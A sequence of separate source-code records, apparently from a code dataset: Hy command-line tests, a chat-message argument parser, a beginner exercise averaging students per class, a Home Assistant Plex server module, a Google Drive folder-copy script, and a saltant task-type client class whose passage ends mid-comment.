assert "Hy!" in output
def test_bin_hy_icmd_and_spy():
output, _ = run_cmd("hy -i \"(+ [] [])\" --spy", "(+ 1 1)")
assert "[] + []" in output
def test_bin_hy_missing_file():
_, err = run_cmd("hy foobarbaz", expect=2)
assert "No such file" in err
def test_bin_hy_file_with_args():
assert "usage" in run_cmd("hy tests/resources/argparse_ex.hy -h")[0]
assert "got c" in run_cmd("hy tests/resources/argparse_ex.hy -c bar")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo -c bar")[0] # noqa
def test_bin_hyc():
_, err = run_cmd("hyc", expect=2)
assert "usage" in err
output, _ = run_cmd("hyc -h")
assert "usage" in output
path = "tests/resources/argparse_ex.hy"
output, _ = run_cmd("hyc " + path)
assert "Compiling" in output
assert os.path.exists(get_bytecode_path(path))
rm(get_bytecode_path(path))
def test_bin_hyc_missing_file():
_, err = run_cmd("hyc foobarbaz", expect=2)
assert "[Errno 2]" in err
def test_bin_hy_builtins():
# hy.cmdline replaces builtins.exit and builtins.quit
# for use by hy's repl.
import hy.cmdline # NOQA
# this test will fail if run from IPython because IPython deletes
# builtins.exit and builtins.quit
assert str(builtins.exit) == "Use (exit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.exit) is hy.cmdline.HyQuitter
assert str(builtins.quit) == "Use (quit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.quit) is hy.cmdline.HyQuitter
def test_bin_hy_main():
output, _ = run_cmd("hy tests/resources/bin/main.hy")
assert "Hello World" in output
def test_bin_hy_main_args():
output, _ = run_cmd("hy tests/resources/bin/main.hy test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_main_exitvalue():
run_cmd("hy tests/resources/bin/main.hy exit1", expect=1)
def test_bin_hy_no_main():
output, _ = run_cmd("hy tests/resources/bin/nomain.hy")
assert "This Should Still Work" in output
@pytest.mark.parametrize('scenario', [
"normal", "prevent_by_force", "prevent_by_env"])
@pytest.mark.parametrize('cmd_fmt', [
'hy {fpath}', 'hy -m {modname}', "hy -c '(import {modname})'"])
def test_bin_hy_byte_compile(scenario, cmd_fmt):
modname = "tests.resources.bin.bytecompile"
fpath = modname.replace(".", "/") + ".hy"
cmd = cmd_fmt.format(**locals())
rm(get_bytecode_path(fpath))
if scenario == "prevent_by_force":
# Keep Hy from being able to byte-compile the module by
# creating a directory at the target location.
os.mkdir(get_bytecode_path(fpath))
# Whether or not we can byte-compile the module, we should be able
# to run it.
output, _ = run_cmd(cmd, dontwritebytecode=scenario == "prevent_by_env")
assert "Hello from macro" in output
assert "The macro returned: boink" in output
if scenario == "normal":
# That should've byte-compiled the module.
assert os.path.exists(get_bytecode_path(fpath))
elif scenario == "prevent_by_env":
# No byte-compiled version should've been created.
assert not os.path.exists(get_bytecode_path(fpath))
# When we run the same command again, and we've byte-compiled the
# module, the byte-compiled version should be run instead of the
# source, in which case the macro shouldn't be run.
output, _ = run_cmd(cmd)
assert ("Hello from macro" in output) ^ (scenario == "normal")
assert "The macro returned: boink" in output
def test_bin_hy_module_main():
output, _ = run_cmd("hy -m tests.resources.bin.main")
assert "Hello World" in output
def test_bin_hy_module_main_args():
output, _ = run_cmd("hy -m tests.resources.bin.main test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_module_main_exitvalue():
run_cmd("hy -m tests.resources.bin.main exit1", expect=1)
def test_bin_hy_module_no_main():
output, _ = run_cmd("hy -m tests.resources.bin.nomain")
assert "This Should Still Work" in output
|
the-stack_0_1601 | # MIT License
# Copyright (c) 2022 Zenitsu Prjkt™
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
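# --- Hedged usage sketch (not part of the original module) ---
# `message` is assumed to be a Telegram-style message object exposing a `.text`
# attribute (as in Pyrogram/Telethon userbots); the stand-in class below only
# mimics that attribute for illustration.
if __name__ == "__main__":
    class _FakeMessage:
        text = ".echo hello world"

    print(get_arg(_FakeMessage()))  # -> "hello world"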
|
the-stack_0_1602 | # Marcelo Campos de Medeiros
# ADS UNIFIP
# Repetition structures (loops)
# 25/03/2020
'''
27 - Write a program that calculates the average number of students per class.
To do this, ask for the number of classes and the number of students
in each class. A class cannot have more than 40 students.
'''
print('=' * 40)
print('{:=^40}'.format(" 'AVERAGE NUMBER OF STUDENTS PER CLASS' "))
print('=' * 40, '\n')
turmas = int(input('How many classes are there: '))
soma = 0
for c in range(1, turmas + 1):
    # repeat the prompt until a valid class size (at most 40 students) is entered
    while True:
        alunos = int(input(f'How many students are in class {c}: '))
        if alunos <= 40:
            break
        else:
            print('Classes cannot have more than 40 students. Enter the value again.')
    soma += alunos
print(f'The school has {turmas} classes\n'
      f'with a total of {soma} students,\n'
      f'so the average number of students per class is {soma / turmas:.2f}')
the-stack_0_1603 | """Shared class to maintain Plex server instances."""
import logging
import ssl
import time
from urllib.parse import urlparse
from plexapi.exceptions import NotFound, Unauthorized
import plexapi.myplex
import plexapi.playqueue
import plexapi.server
from requests import Session
import requests.exceptions
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.media_player.const import (
MEDIA_TYPE_EPISODE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_PLAYLIST,
MEDIA_TYPE_VIDEO,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_TOKEN, CONF_URL, CONF_VERIFY_SSL
from homeassistant.core import callback
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_IGNORE_NEW_SHARED_USERS,
CONF_IGNORE_PLEX_WEB_CLIENTS,
CONF_MONITORED_USERS,
CONF_SERVER,
CONF_USE_EPISODE_ART,
DEBOUNCE_TIMEOUT,
DEFAULT_VERIFY_SSL,
DOMAIN,
PLAYER_SOURCE,
PLEX_NEW_MP_SIGNAL,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL,
PLEX_UPDATE_SENSOR_SIGNAL,
PLEXTV_THROTTLE,
X_PLEX_DEVICE_NAME,
X_PLEX_PLATFORM,
X_PLEX_PRODUCT,
X_PLEX_VERSION,
)
from .errors import NoServersFound, ServerNotSpecified, ShouldUpdateConfigEntry
_LOGGER = logging.getLogger(__name__)
# Set default headers sent by plexapi
plexapi.X_PLEX_DEVICE_NAME = X_PLEX_DEVICE_NAME
plexapi.X_PLEX_PLATFORM = X_PLEX_PLATFORM
plexapi.X_PLEX_PRODUCT = X_PLEX_PRODUCT
plexapi.X_PLEX_VERSION = X_PLEX_VERSION
class PlexServer:
"""Manages a single Plex server connection."""
def __init__(self, hass, server_config, known_server_id=None, options=None):
"""Initialize a Plex server instance."""
self.hass = hass
self._plex_account = None
self._plex_server = None
self._created_clients = set()
self._known_clients = set()
self._known_idle = set()
self._url = server_config.get(CONF_URL)
self._token = server_config.get(CONF_TOKEN)
self._server_name = server_config.get(CONF_SERVER)
self._verify_ssl = server_config.get(CONF_VERIFY_SSL, DEFAULT_VERIFY_SSL)
self._server_id = known_server_id
self.options = options
self.server_choice = None
self._accounts = []
self._owner_username = None
self._plextv_clients = None
self._plextv_client_timestamp = 0
self._plextv_device_cache = {}
self._use_plex_tv = self._token is not None
self._version = None
self.async_update_platforms = Debouncer(
hass,
_LOGGER,
cooldown=DEBOUNCE_TIMEOUT,
immediate=True,
function=self._async_update_platforms,
).async_call
# Header conditionally added as it is not available in config entry v1
if CONF_CLIENT_ID in server_config:
plexapi.X_PLEX_IDENTIFIER = server_config[CONF_CLIENT_ID]
plexapi.myplex.BASE_HEADERS = plexapi.reset_base_headers()
plexapi.server.BASE_HEADERS = plexapi.reset_base_headers()
@property
def account(self):
"""Return a MyPlexAccount instance."""
if not self._plex_account and self._use_plex_tv:
try:
self._plex_account = plexapi.myplex.MyPlexAccount(token=self._token)
except Unauthorized:
self._use_plex_tv = False
_LOGGER.error("Not authorized to access plex.tv with provided token")
raise
return self._plex_account
def plextv_clients(self):
"""Return available clients linked to Plex account."""
if self.account is None:
return []
now = time.time()
if now - self._plextv_client_timestamp > PLEXTV_THROTTLE:
self._plextv_client_timestamp = now
self._plextv_clients = [
x
for x in self.account.resources()
if "player" in x.provides and x.presence
]
_LOGGER.debug(
"Current available clients from plex.tv: %s", self._plextv_clients
)
return self._plextv_clients
def connect(self):
"""Connect to a Plex server directly, obtaining direct URL if necessary."""
config_entry_update_needed = False
def _connect_with_token():
available_servers = [
(x.name, x.clientIdentifier)
for x in self.account.resources()
if "server" in x.provides
]
if not available_servers:
raise NoServersFound
if not self._server_name and len(available_servers) > 1:
raise ServerNotSpecified(available_servers)
self.server_choice = (
self._server_name if self._server_name else available_servers[0][0]
)
self._plex_server = self.account.resource(self.server_choice).connect(
timeout=10
)
def _connect_with_url():
session = None
if self._url.startswith("https") and not self._verify_ssl:
session = Session()
session.verify = False
self._plex_server = plexapi.server.PlexServer(
self._url, self._token, session
)
def _update_plexdirect_hostname():
matching_servers = [
x.name
for x in self.account.resources()
if x.clientIdentifier == self._server_id
]
if matching_servers:
self._plex_server = self.account.resource(matching_servers[0]).connect(
timeout=10
)
return True
_LOGGER.error("Attempt to update plex.direct hostname failed")
return False
if self._url:
try:
_connect_with_url()
except requests.exceptions.SSLError as error:
while error and not isinstance(error, ssl.SSLCertVerificationError):
error = error.__context__ # pylint: disable=no-member
if isinstance(error, ssl.SSLCertVerificationError):
domain = urlparse(self._url).netloc.split(":")[0]
if domain.endswith("plex.direct") and error.args[0].startswith(
f"hostname '{domain}' doesn't match"
):
_LOGGER.warning(
"Plex SSL certificate's hostname changed, updating."
)
if _update_plexdirect_hostname():
config_entry_update_needed = True
else:
raise Unauthorized(
"New certificate cannot be validated with provided token"
)
else:
raise
else:
raise
else:
_connect_with_token()
try:
system_accounts = self._plex_server.systemAccounts()
except Unauthorized:
_LOGGER.warning(
"Plex account has limited permissions, shared account filtering will not be available."
)
else:
self._accounts = [
account.name for account in system_accounts if account.name
]
_LOGGER.debug("Linked accounts: %s", self.accounts)
owner_account = [
account.name for account in system_accounts if account.accountID == 1
]
if owner_account:
self._owner_username = owner_account[0]
_LOGGER.debug("Server owner found: '%s'", self._owner_username)
self._version = self._plex_server.version
if config_entry_update_needed:
raise ShouldUpdateConfigEntry
@callback
def async_refresh_entity(self, machine_identifier, device, session):
"""Forward refresh dispatch to media_player."""
unique_id = f"{self.machine_identifier}:{machine_identifier}"
_LOGGER.debug("Refreshing %s", unique_id)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL.format(unique_id),
device,
session,
)
def _fetch_platform_data(self):
"""Fetch all data from the Plex server in a single method."""
return (
self._plex_server.clients(),
self._plex_server.sessions(),
self.plextv_clients(),
)
async def _async_update_platforms(self):
"""Update the platform entities."""
_LOGGER.debug("Updating devices")
available_clients = {}
ignored_clients = set()
new_clients = set()
monitored_users = self.accounts
known_accounts = set(self.option_monitored_users)
if known_accounts:
monitored_users = {
user
for user in self.option_monitored_users
if self.option_monitored_users[user]["enabled"]
}
if not self.option_ignore_new_shared_users:
for new_user in self.accounts - known_accounts:
monitored_users.add(new_user)
try:
devices, sessions, plextv_clients = await self.hass.async_add_executor_job(
self._fetch_platform_data
)
except (
plexapi.exceptions.BadRequest,
requests.exceptions.RequestException,
) as ex:
_LOGGER.error(
"Could not connect to Plex server: %s (%s)", self.friendly_name, ex
)
return
def process_device(source, device):
self._known_idle.discard(device.machineIdentifier)
available_clients.setdefault(device.machineIdentifier, {"device": device})
available_clients[device.machineIdentifier].setdefault(
PLAYER_SOURCE, source
)
if device.machineIdentifier not in ignored_clients:
if self.option_ignore_plexweb_clients and device.product == "Plex Web":
ignored_clients.add(device.machineIdentifier)
if device.machineIdentifier not in self._known_clients:
_LOGGER.debug(
"Ignoring %s %s: %s",
"Plex Web",
source,
device.machineIdentifier,
)
return
if device.machineIdentifier not in (
self._created_clients | ignored_clients | new_clients
):
new_clients.add(device.machineIdentifier)
_LOGGER.debug(
"New %s from %s: %s",
device.product,
source,
device.machineIdentifier,
)
for device in devices:
process_device("PMS", device)
def connect_to_resource(resource):
"""Connect to a plex.tv resource and return a Plex client."""
client_id = resource.clientIdentifier
if client_id in self._plextv_device_cache:
return self._plextv_device_cache[client_id]
client = None
try:
client = resource.connect(timeout=3)
_LOGGER.debug("plex.tv resource connection successful: %s", client)
except NotFound:
_LOGGER.error("plex.tv resource connection failed: %s", resource.name)
self._plextv_device_cache[client_id] = client
return client
for plextv_client in plextv_clients:
if plextv_client.clientIdentifier not in available_clients:
device = await self.hass.async_add_executor_job(
connect_to_resource, plextv_client
)
if device:
process_device("plex.tv", device)
for session in sessions:
if session.TYPE == "photo":
_LOGGER.debug("Photo session detected, skipping: %s", session)
continue
session_username = session.usernames[0]
for player in session.players:
if session_username and session_username not in monitored_users:
ignored_clients.add(player.machineIdentifier)
_LOGGER.debug(
"Ignoring %s client owned by '%s'",
player.product,
session_username,
)
continue
process_device("session", player)
available_clients[player.machineIdentifier]["session"] = session
new_entity_configs = []
for client_id, client_data in available_clients.items():
if client_id in ignored_clients:
continue
if client_id in new_clients:
new_entity_configs.append(client_data)
self._created_clients.add(client_id)
else:
self.async_refresh_entity(
client_id, client_data["device"], client_data.get("session")
)
self._known_clients.update(new_clients | ignored_clients)
idle_clients = (
self._known_clients - self._known_idle - ignored_clients
).difference(available_clients)
for client_id in idle_clients:
self.async_refresh_entity(client_id, None, None)
self._known_idle.add(client_id)
self._plextv_device_cache.pop(client_id, None)
if new_entity_configs:
async_dispatcher_send(
self.hass,
PLEX_NEW_MP_SIGNAL.format(self.machine_identifier),
new_entity_configs,
)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_SENSOR_SIGNAL.format(self.machine_identifier),
sessions,
)
@property
def plex_server(self):
"""Return the plexapi PlexServer instance."""
return self._plex_server
@property
def accounts(self):
"""Return accounts associated with the Plex server."""
return set(self._accounts)
@property
def owner(self):
"""Return the Plex server owner username."""
return self._owner_username
@property
def version(self):
"""Return the version of the Plex server."""
return self._version
@property
def friendly_name(self):
"""Return name of connected Plex server."""
return self._plex_server.friendlyName
@property
def machine_identifier(self):
"""Return unique identifier of connected Plex server."""
return self._plex_server.machineIdentifier
@property
def url_in_use(self):
"""Return URL used for connected Plex server."""
return self._plex_server._baseurl # pylint: disable=protected-access
@property
def option_ignore_new_shared_users(self):
"""Return ignore_new_shared_users option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_NEW_SHARED_USERS, False)
@property
def option_use_episode_art(self):
"""Return use_episode_art option."""
return self.options[MP_DOMAIN].get(CONF_USE_EPISODE_ART, False)
@property
def option_monitored_users(self):
"""Return dict of monitored users option."""
return self.options[MP_DOMAIN].get(CONF_MONITORED_USERS, {})
@property
def option_ignore_plexweb_clients(self):
"""Return ignore_plex_web_clients option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_PLEX_WEB_CLIENTS, False)
@property
def library(self):
"""Return library attribute from server object."""
return self._plex_server.library
def playlist(self, title):
"""Return playlist from server object."""
return self._plex_server.playlist(title)
def create_playqueue(self, media, **kwargs):
"""Create playqueue on Plex server."""
return plexapi.playqueue.PlayQueue.create(self._plex_server, media, **kwargs)
def fetch_item(self, item):
"""Fetch item from Plex server."""
return self._plex_server.fetchItem(item)
def lookup_media(self, media_type, **kwargs):
"""Lookup a piece of media."""
media_type = media_type.lower()
if media_type == DOMAIN:
key = kwargs["plex_key"]
try:
return self.fetch_item(key)
except NotFound:
_LOGGER.error("Media for key %s not found", key)
return None
if media_type == MEDIA_TYPE_PLAYLIST:
try:
playlist_name = kwargs["playlist_name"]
return self.playlist(playlist_name)
except KeyError:
_LOGGER.error("Must specify 'playlist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Playlist '%s' not found", playlist_name,
)
return None
try:
library_name = kwargs["library_name"]
library_section = self.library.section(library_name)
except KeyError:
_LOGGER.error("Must specify 'library_name' for this search")
return None
except NotFound:
_LOGGER.error("Library '%s' not found", library_name)
return None
def lookup_music():
"""Search for music and return a Plex media object."""
album_name = kwargs.get("album_name")
track_name = kwargs.get("track_name")
track_number = kwargs.get("track_number")
try:
artist_name = kwargs["artist_name"]
artist = library_section.get(artist_name)
except KeyError:
_LOGGER.error("Must specify 'artist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Artist '%s' not found in '%s'", artist_name, library_name
)
return None
if album_name:
try:
album = artist.album(album_name)
except NotFound:
_LOGGER.error(
"Album '%s' by '%s' not found", album_name, artist_name
)
return None
if track_name:
try:
return album.track(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' on '%s' by '%s' not found",
track_name,
album_name,
artist_name,
)
return None
if track_number:
for track in album.tracks():
if int(track.index) == int(track_number):
return track
_LOGGER.error(
"Track %d on '%s' by '%s' not found",
track_number,
album_name,
artist_name,
)
return None
return album
if track_name:
try:
return artist.get(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' by '%s' not found", track_name, artist_name
)
return None
return artist
def lookup_tv():
"""Find TV media and return a Plex media object."""
season_number = kwargs.get("season_number")
episode_number = kwargs.get("episode_number")
try:
show_name = kwargs["show_name"]
show = library_section.get(show_name)
except KeyError:
_LOGGER.error("Must specify 'show_name' for this search")
return None
except NotFound:
_LOGGER.error("Show '%s' not found in '%s'", show_name, library_name)
return None
if not season_number:
return show
try:
season = show.season(int(season_number))
except NotFound:
_LOGGER.error(
"Season %d of '%s' not found", season_number, show_name,
)
return None
if not episode_number:
return season
try:
return season.episode(episode=int(episode_number))
except NotFound:
_LOGGER.error(
"Episode not found: %s - S%sE%s",
show_name,
str(season_number).zfill(2),
str(episode_number).zfill(2),
)
return None
if media_type == MEDIA_TYPE_MUSIC:
return lookup_music()
if media_type == MEDIA_TYPE_EPISODE:
return lookup_tv()
if media_type == MEDIA_TYPE_VIDEO:
try:
video_name = kwargs["video_name"]
return library_section.get(video_name)
except KeyError:
_LOGGER.error("Must specify 'video_name' for this search")
except NotFound:
_LOGGER.error(
"Movie '%s' not found in '%s'", video_name, library_name,
)
|
the-stack_0_1604 | from __future__ import print_function
import datetime
import time
import httplib2
import os
import sys
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from logbook import Logger, FileHandler, StreamHandler
log = Logger('copy-google-drive-folder')
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser])
# add in our specific command line requirements
flags.add_argument('--source-folder_id', '-f', type=str, required=True,
help="Source Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--target-folder_id', '-t', type=str, required=True,
help="Target Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--page-size', '-p', type=int, default=100,
help="Number of files in each page (defaults to 100)")
flags.add_argument('--start-page', '-s', type=int, default=1,
help="start from page N of the file listing (defaults to 1)")
flags.add_argument('--end-page', '-e', type=int, default=None,
help="stop paging at page N of the file listing (defaults to not stop before the end)")
flags.add_argument('--log-dir', '-l', type=str, help='Where to put log files', default='/tmp')
flags.add_argument('--log-level', type=str, help='Choose a log level', default='INFO')
args = flags.parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
# SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Copy Google Drive Folders'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-copy-google-folders.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, args)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
log.info('Storing credentials to ' + credential_path)
return credentials
def ensure_trailing_slash(val):
if val[-1] != '/':
return "{}/".format(val)
return val
def main():
"""
Copy a folder from Source to Target
"""
log_filename = os.path.join(
args.log_dir,
'copy-google-drive-folder-{}.log'.format(os.path.basename(time.strftime('%Y%m%d-%H%M%S')))
)
# register some logging handlers
log_handler = FileHandler(
log_filename,
mode='w',
level=args.log_level,
bubble=True
)
stdout_handler = StreamHandler(sys.stdout, level=args.log_level, bubble=True)
with stdout_handler.applicationbound():
with log_handler.applicationbound():
log.info("Arguments: {}".format(args))
start = time.time()
log.info("starting at {}".format(time.strftime('%l:%M%p %Z on %b %d, %Y')))
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
drive_service = discovery.build('drive', 'v3', http=http)
# get the files in the specified folder.
files = drive_service.files()
request = files.list(
pageSize=args.page_size,
q="'{}' in parents".format(args.source_folder_id),
fields="nextPageToken, files(id, name, mimeType)"
)
page_counter = 0
file_counter = 0
while request is not None:
file_page = request.execute(http=http)
page_counter += 1
page_file_counter = 0 # reset the paging file counter
# determine the page at which to start processing.
if page_counter >= args.start_page:
log.info(u"######## Page {} ########".format(page_counter))
for this_file in file_page['files']:
file_counter += 1
page_file_counter += 1
log.info(u"#== Processing {} {} file number {} on page {}. {} files processed.".format(
this_file['mimeType'],
this_file['name'],
page_file_counter,
page_counter,
file_counter
))
# if not a folder
if this_file['mimeType'] != 'application/vnd.google-apps.folder':
# Copy the file
                            new_file = {'name': this_file['name']}  # Drive API v3 uses 'name' (v2 used 'title')
copied_file = drive_service.files().copy(fileId=this_file['id'], body=new_file).execute()
# move it to it's new location
drive_service.files().update(
fileId=copied_file['id'],
addParents=args.target_folder_id,
removeParents=args.source_folder_id
).execute()
else:
log.info(u"Skipped Folder")
else:
log.info(u"Skipping Page {}".format(page_counter))
# stop if we have come to the last user specified page
if args.end_page and page_counter == args.end_page:
log.info(u"Finished paging at page {}".format(page_counter))
break
# request the next page of files
request = files.list_next(request, file_page)
log.info("Running time: {}".format(str(datetime.timedelta(seconds=(round(time.time() - start, 3))))))
log.info("Log written to {}:".format(log_filename))
if __name__ == '__main__':
main()
|
the-stack_0_1606 | """Base class for task type models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import dateutil.parser
from saltant.constants import HTTP_200_OK, HTTP_201_CREATED
from .resource import Model, ModelManager
class BaseTaskType(Model):
"""Base model for a task type.
Attributes:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime when
the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables required
on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for the
task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
def __init__(
self,
id,
name,
description,
user,
datetime_created,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
manager,
):
"""Initialize a task type.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
user (str): The user associated with the task type.
datetime_created (:class:`datetime.datetime`): The datetime
when the task type was created.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
                the task's required arguments.
manager (:class:`saltant.models.base_task_type.BaseTaskTypeManager`):
The task type manager which spawned this task type.
"""
# Call parent constructor
super(BaseTaskType, self).__init__(manager)
self.id = id
self.name = name
self.description = description
self.user = user
self.datetime_created = datetime_created
self.command_to_run = command_to_run
self.environment_variables = environment_variables
self.required_arguments = required_arguments
self.required_arguments_default_values = (
required_arguments_default_values
)
def __str__(self):
"""String representation of the task type."""
return "%s (%s)" % (self.name, self.user)
def sync(self):
"""Sync this model with latest data on the saltant server.
Note that in addition to returning the updated object, it also
updates the existing object.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
This task type instance after syncing.
"""
self = self.manager.get(id=self.id)
return self
def put(self):
"""Updates this task type on the saltant server.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
just updated.
"""
return self.manager.put(
id=self.id,
name=self.name,
description=self.description,
command_to_run=self.command_to_run,
environment_variables=self.environment_variables,
required_arguments=self.required_arguments,
required_arguments_default_values=(
self.required_arguments_default_values
),
)
class BaseTaskTypeManager(ModelManager):
"""Base manager for task types.
Attributes:
_client (:class:`saltant.client.Client`): An authenticated
saltant client.
list_url (str): The URL to list task types.
detail_url (str): The URL format to get specific task types.
model (:class:`saltant.models.resource.Model`): The model of the
task type being used.
"""
model = BaseTaskType
def get(self, id=None, name=None):
"""Get a task type.
Either the id xor the name of the task type must be specified.
Args:
id (int, optional): The id of the task type to get.
name (str, optional): The name of the task type to get.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A task type model instance representing the task type
requested.
Raises:
ValueError: Neither id nor name were set *or* both id and
name were set.
"""
# Validate arguments - use an xor
if not ((id is None) ^ (name is None)):
raise ValueError("Either id or name must be set (but not both!)")
# If it's just ID provided, call the parent function
if id is not None:
return super(BaseTaskTypeManager, self).get(id=id)
# Try getting the task type by name
return self.list(filters={"name": name})[0]
def create(
self,
name,
command_to_run,
description="",
environment_variables=None,
required_arguments=None,
required_arguments_default_values=None,
extra_data_to_post=None,
):
"""Create a task type.
Args:
name (str): The name of the task.
command_to_run (str): The command to run to execute the task.
description (str, optional): The description of the task type.
environment_variables (list, optional): The environment
variables required on the host to execute the task.
required_arguments (list, optional): The argument names for
the task type.
required_arguments_default_values (dict, optional): Default
                values for the task's required arguments.
extra_data_to_post (dict, optional): Extra key-value pairs
to add to the request data. This is useful for
subclasses which require extra parameters.
Returns:
:class:`saltant.models.base_task_instance.BaseTaskType`:
A task type model instance representing the task type
just created.
"""
# Set None for optional list and dicts to proper datatypes
if environment_variables is None:
environment_variables = []
if required_arguments is None:
required_arguments = []
if required_arguments_default_values is None:
required_arguments_default_values = {}
# Create the object
request_url = self._client.base_api_url + self.list_url
data_to_post = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_post is not None:
data_to_post.update(extra_data_to_post)
response = self._client.session.post(request_url, data=data_to_post)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_201_CREATED,
)
# Return a model instance representing the task type
return self.response_data_to_model_instance(response.json())
def put(
self,
id,
name,
description,
command_to_run,
environment_variables,
required_arguments,
required_arguments_default_values,
extra_data_to_put=None,
):
"""Updates a task type on the saltant server.
Args:
id (int): The ID of the task type.
name (str): The name of the task type.
description (str): The description of the task type.
command_to_run (str): The command to run to execute the task.
environment_variables (list): The environment variables
required on the host to execute the task.
required_arguments (list): The argument names for the task type.
required_arguments_default_values (dict): Default values for
                the task's required arguments.
extra_data_to_put (dict, optional): Extra key-value pairs to
add to the request data. This is useful for subclasses
which require extra parameters.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A :class:`saltant.models.base_task_type.BaseTaskType`
subclass instance representing the task type just
updated.
"""
# Update the object
request_url = self._client.base_api_url + self.detail_url.format(id=id)
data_to_put = {
"name": name,
"description": description,
"command_to_run": command_to_run,
"environment_variables": json.dumps(environment_variables),
"required_arguments": json.dumps(required_arguments),
"required_arguments_default_values": json.dumps(
required_arguments_default_values
),
}
# Add in extra data if any was passed in
if extra_data_to_put is not None:
data_to_put.update(extra_data_to_put)
response = self._client.session.put(request_url, data=data_to_put)
# Validate that the request was successful
self.validate_request_success(
response_text=response.text,
request_url=request_url,
status_code=response.status_code,
expected_status_code=HTTP_200_OK,
)
# Return a model instance representing the task instance
return self.response_data_to_model_instance(response.json())
def response_data_to_model_instance(self, response_data):
"""Convert response data to a task type model.
Args:
response_data (dict): The data from the request's response.
Returns:
:class:`saltant.models.base_task_type.BaseTaskType`:
A model instance representing the task type from the
reponse data.
"""
# Coerce datetime strings into datetime objects
response_data["datetime_created"] = dateutil.parser.parse(
response_data["datetime_created"]
)
# Instantiate a model for the task instance
return super(
BaseTaskTypeManager, self
).response_data_to_model_instance(response_data)
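# --- Hedged sketch (not part of the original module) ---
# Illustrates how a concrete manager is expected to specialise this base class,
# using only the attributes documented in BaseTaskTypeManager's docstring
# (list_url, detail_url, model). The URL patterns below are illustrative
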